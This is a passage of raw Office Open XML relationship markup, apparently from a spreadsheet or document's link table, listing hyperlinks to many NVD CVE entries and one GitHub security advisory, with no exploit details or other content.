Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87613" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87911" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30864" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79921" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-56798" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14359" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19633" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21094" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31936" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33240" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41870" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48050" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49050" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53527" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53528" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53706" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54721" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55485" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55509" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55541" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55585" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55637" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57866" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62316" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69857" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71808" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75161" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75166" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75169" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75339" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76801" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79423" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80099" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80130" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80914" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80921" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82089" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86099" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86404" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86482" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86775" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87430" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87433" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87440" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87444" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87460" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87489" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87536" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87542" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87569" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87570" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87579" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87585" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87587" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87588" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87612" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87617" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87625" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87636" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87766" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87795" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87823" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87927" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54355" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54390" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54393" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58381" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58382" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14297" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40877" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47665" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53530" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53758" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53924" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55245" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55763" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55764" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57445" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62865" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63383" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63384" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63403" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77120" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77298" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77354" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77357" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79756" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79989" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81640" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84304" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86199" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86201" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86428" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86435" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87807" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87808" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87816" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87817" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87822" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87995" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-rg7q-4223-phjw" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14962" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19233" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26212" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34741" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47727" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49310" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50553" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52776" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54511" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55182" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55534" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55539" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55557" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55580" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55848" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63219" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77775" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79322" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80214" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8044" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81889" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84068" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86762" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86770" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87633" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12858" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54606" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55108" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55526" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77974" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87023" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87030" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-12737" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20501" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20502" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52491" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55581" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55582" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63388" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71612" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71614" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77118" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82563" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86502" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86741" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87794" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87811" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87813" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87815" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29988" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38820" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45730" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48105" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48106" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53507" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82404" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85091" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86750" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86771" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87034" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87479" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87480" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87481" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87487" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87506" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 